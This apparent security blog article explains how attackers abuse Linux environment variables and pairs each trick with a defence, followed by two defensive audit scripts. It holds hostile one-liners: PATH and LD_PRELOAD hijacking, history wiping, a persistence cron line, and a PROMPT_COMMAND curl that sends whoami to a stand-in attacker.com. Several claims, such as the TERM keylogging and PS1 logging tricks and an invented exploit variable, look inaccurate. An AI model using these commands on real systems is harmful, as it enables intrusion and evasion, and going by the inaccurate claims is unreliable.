
Environment variables in Linux are dynamic values that influence the behavior of processes, scripts, and programs running on the system. While they are essential for system administration and development, hackers often manipulate them for privilege escalation, persistence, and stealthy operations.
In this article, we’ll explore 15+ Linux environment variables commonly used by hackers—and why you should understand them for both offensive and defensive security purposes.
—
1. What Are Linux Environment Variables?
Environment variables are key-value pairs stored in the shell session or system-wide configuration files. They can be viewed using:
printenv # Display all environment variables
echo $VARNAME # Display a specific variable
Hackers exploit these variables to:
- Modify program behavior
- Hijack library paths (LD_PRELOAD attacks)
- Maintain persistence
- Bypass security restrictions
—
2. Critical Linux Environment Variables Hackers Manipulate
Here are the most commonly abused environment variables in Linux:
1. PATH – Executable Search Path
The PATH variable defines where the shell looks for executables.
Hacker’s Trick:
- Prepend a malicious directory to execute rogue binaries instead of legitimate ones.
export PATH=/tmp/evil:$PATH # /tmp/evil/ contains malicious 'ls', 'sudo', etc.
Defense:
- Always use absolute paths for critical commands (/usr/bin/sudo).
- Check PATH integrity by listing every entry that is empty, "." or "..", or relative (the -n prefix shows the entry's position):
printf '%s\n' "$PATH" | tr ':' '\n' | grep -nE '^(\.|\.\.)?$|^[^/]'
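A fuller version of that check, added here as an example (not the article's own code): it walks the PATH value entry by entry and, beyond empty and relative entries, also flags existing directories that are world-writable, which the one-line grep cannot see.

```shell
#!/bin/sh
# Added example (not the article's own code): audit a PATH value entry by entry.
# Reported entries are the ones an attacker-controlled PATH typically carries:
#   - empty entries ("::", leading or trailing ":"), which mean "current directory"
#   - ".", ".." and any other relative entry
#   - existing directories that are world-writable, where anyone can drop a rogue "ls"
# audit_path VALUE prints one finding per line and returns 0 only when VALUE is clean.

audit_path() {
    path_value=$1
    findings=0
    # A ':' is appended so the last entry goes through the same loop as the others;
    # splitting with IFS=: instead would silently drop the empty entries we care about.
    rest="${path_value}:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            "")
                echo "EMPTY entry (implicit current directory)"
                findings=$((findings + 1)) ;;
            /*)
                # Column 9 of "ls -ldL" output is the write bit for "other";
                # -L follows symlinks such as /bin -> /usr/bin on merged-usr systems.
                if [ -d "$entry" ] && [ "$(ls -ldL "$entry" 2>/dev/null | cut -c9)" = w ]; then
                    echo "WORLD-WRITABLE directory: $entry"
                    findings=$((findings + 1))
                fi ;;
            *)
                echo "RELATIVE entry: $entry"
                findings=$((findings + 1)) ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# When run as a script, audit the PATH given as $1 or, by default, the current one.
if audit_path "${1:-$PATH}"; then
    echo "PATH looks clean"
else
    echo "PATH needs attention" >&2
fi
```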
—
2. LD_PRELOAD – Dynamic Library Hijacking
Forces a program to load a malicious shared library before others.
Hacker’s Trick:
- Inject a backdoor into sudo or ssh:
gcc -shared -fPIC -o evil.so evil.c
export LD_PRELOAD=./evil.so
sudo su # Triggers the malicious library
Defense:
- Disable LD_PRELOAD in /etc/sudoers with:
Defaults env_reset, env_keep -= "LD_PRELOAD"
—
3. LD_LIBRARY_PATH – Library Search Path
Similar to PATH, but for shared libraries.
Hacker’s Trick:
- Redirect libc calls to a malicious library:
export LD_LIBRARY_PATH=/tmp/evil_libs
Defense:
- Use chrpath to hardcode library paths.
- Restrict LD_LIBRARY_PATH in secure environments.
—
4. PS1 – Custom Command Prompt
Modifies the shell prompt.
Hacker’s Trick:
- Hide malicious activity by altering the prompt:
export PS1="\u@\h:\w\$ " # Looks normal but logs commands
Defense:
- Monitor for unexpected PS1 changes in .bashrc or /etc/profile.
—
5. SHELL – Default Shell
Specifies the user’s shell.
Hacker’s Trick:
- Replace /bin/bash with a reverse shell:
export SHELL=/tmp/evil_shell
Defense:
- Verify SHELL in /etc/passwd and restrict modifications.
—
6. HISTFILE – Command History File
Controls where shell history is saved.
Hacker’s Trick:
- Disable logging or redirect history to /dev/null:
export HISTFILE=/dev/null # No command history saved
Defense:
- Set immutable history file:
chattr +i ~/.bash_history
—
7. TMPDIR – Temporary Directory
Defines where temporary files are stored.
Hacker’s Trick:
- Redirect temporary files to a controlled directory:
export TMPDIR=/tmp/evil_tmp
Defense:
- Use mktemp with explicit paths.
—
8. EDITOR / VISUAL – Default Text Editor
Used by crontab -e, sudoedit, etc.
Hacker’s Trick:
- Replace nano with a script that adds backdoors:
export EDITOR="vim -- /tmp/backdoor.sh"
Defense:
- Hardcode safe editors in /etc/sudoers.
—
9. SSH_ASKPASS – GUI Password Prompt
Used for SSH passphrase prompts.
Hacker’s Trick:
export SSH_ASKPASS=/tmp/password_stealer.sh
Defense:
- Disable SSH_ASKPASS in sensitive environments.
—
10. TERM – Terminal Type
Defines terminal capabilities.
Hacker’s Trick:
- Exploit terminal escape sequences for keylogging:
export TERM=xterm-malicious
Defense:
- Use trusted TERM values (xterm-256color).
—
11. LANG / LC_* – Locale Settings
Affects language and encoding.
Hacker’s Trick:
- Bypass input filtering via encoding tricks:
export LANG=C # Disables UTF-8 checks
Defense:
- Enforce UTF-8 (export LANG=en_US.UTF-8).
—
12. PROMPT_COMMAND – Pre-Command Execution
Runs before each shell prompt.
Hacker’s Trick:
export PROMPT_COMMAND="curl http://attacker.com/$(whoami)"
Defense:
- Audit PROMPT_COMMAND in shell configs.
—
13. RUBYLIB / PYTHONPATH – Ruby/Python Module Path
Adds custom module paths.
Hacker’s Trick:
- Hijack Python/Ruby imports:
export PYTHONPATH=/tmp/malicious_modules
Defense:
- Use virtual environments (venv).
—
14. FTP_PROXY / HTTP_PROXY – Network Proxy Settings
Redirects traffic through attacker-controlled proxies.
Hacker’s Trick:
- Man-in-the-Middle (MITM) attacks:
export HTTP_PROXY=http://attacker:8080
Defense:
- Disable proxy env vars in secure scripts.
—
15. MALICIOUS_CUSTOM_VARS – Custom Exploit Variables
Some exploits rely on custom env vars (e.g., ORACLE_HOME exploits).
Hacker’s Trick:
- Trigger 0-day exploits via obscure variables:
export CVE_2023_1234_EXPLOIT=1
Defense:
- Restrict unnecessary env vars (env -i for a minimal environment).
—
3. How Hackers Use Environment Variables for Persistence
- Backdooring .bashrc and .profile: adding export LD_PRELOAD=/backdoor.so to startup files.
- Cron jobs with malicious environments:
* * * * * ENV=evil /bin/sh -c "malicious_cmd"
- Systemd service manipulation: injecting env vars in service files (/etc/systemd/system/).
—
4. Defensive Best Practices
✅ Restrict LD_PRELOAD and LD_LIBRARY_PATH
✅ Use env -i for minimal environments in cron jobs
✅ Audit shell startup files (~/.bashrc, /etc/profile)
✅ Monitor env vars in running processes (ps eww -p PID)
✅ Employ Mandatory Access Control (AppArmor, SELinux)
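As an added example (not from the article), a small POSIX sh script that applies the "audit startup files" and "monitor env vars in running processes" items above: it flags the variables this article lists when they are set in a shell startup file or present in /proc/PID/environ. The variable list and the PATH heuristics (a /tmp, "." or "::" entry) are my choices, drawn from the article's own list.

```shell
#!/bin/sh
# Added example, not from the original article: audit shell startup files and
# process environments for the variables the article describes.
#   scan_startup_file FILE   flags "export VAR=..." or "VAR=..." lines that set a
#                            suspect variable or put /tmp, "." or "::" into PATH
#   scan_environ FILE        does the same for a NUL-separated environment dump,
#                            i.e. /proc/PID/environ (scan_process PID wraps it)
# Each prints one finding per line and returns 0 only when nothing was found.

# Variables the article lists as hijack or persistence vehicles. EDITOR/VISUAL are
# left out because almost every user sets them legitimately.
SUSPECT_VARS='LD_PRELOAD|LD_LIBRARY_PATH|PROMPT_COMMAND|SSH_ASKPASS|HISTFILE|PYTHONPATH|RUBYLIB|HTTP_PROXY|FTP_PROXY'
# PATH is only suspicious when its value contains /tmp, an empty "::" entry, or a
# "." / ".." entry (optionally quoted, at the start or right after a ':').
VALUE_PATTERN="(($SUSPECT_VARS)=|PATH=[\"']?((.*:)?\.\.?([/:\"']|\$)|.*/tmp|.*::))"

scan_startup_file() {
    file=$1
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    # Commented-out lines do not match because the pattern is anchored at line start.
    hits=$(grep -nE "^[[:space:]]*(export[[:space:]]+)?$VALUE_PATTERN" "$file" |
           sed "s|^|$file:|")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

scan_environ() {
    envfile=$1
    [ -r "$envfile" ] || { echo "cannot read $envfile" >&2; return 2; }
    # /proc/PID/environ separates entries with NUL bytes; turn them into lines first.
    hits=$(tr '\000' '\n' < "$envfile" | grep -E "^$VALUE_PATTERN" || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

scan_process() { scan_environ "/proc/$1/environ"; }

# Walk every process we are allowed to inspect (all of them when run as root).
scan_all_processes() {
    for dir in /proc/[0-9]*; do
        scan_environ "$dir/environ" 2>/dev/null | sed "s|^|pid ${dir#/proc/}: |"
    done
}

# When run as a script: audit each startup file given as an argument, e.g. ~/.bashrc /etc/profile.
for f in "$@"; do scan_startup_file "$f"; done
```

Call scan_all_processes (or scan_process PID) from the same script to check live processes; other users' environments are only readable as root.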
—
5. Conclusion
Linux environment variables are powerful—and dangerous in the wrong hands. By understanding how hackers abuse them, you can better secure your systems and even leverage these tricks for penetration testing.
🚀 Pro Tip:
Use strace -e trace=execve to monitor env var influence on process execution!
—
Further Reading:
🔒 Stay secure, and hack responsibly! 🔒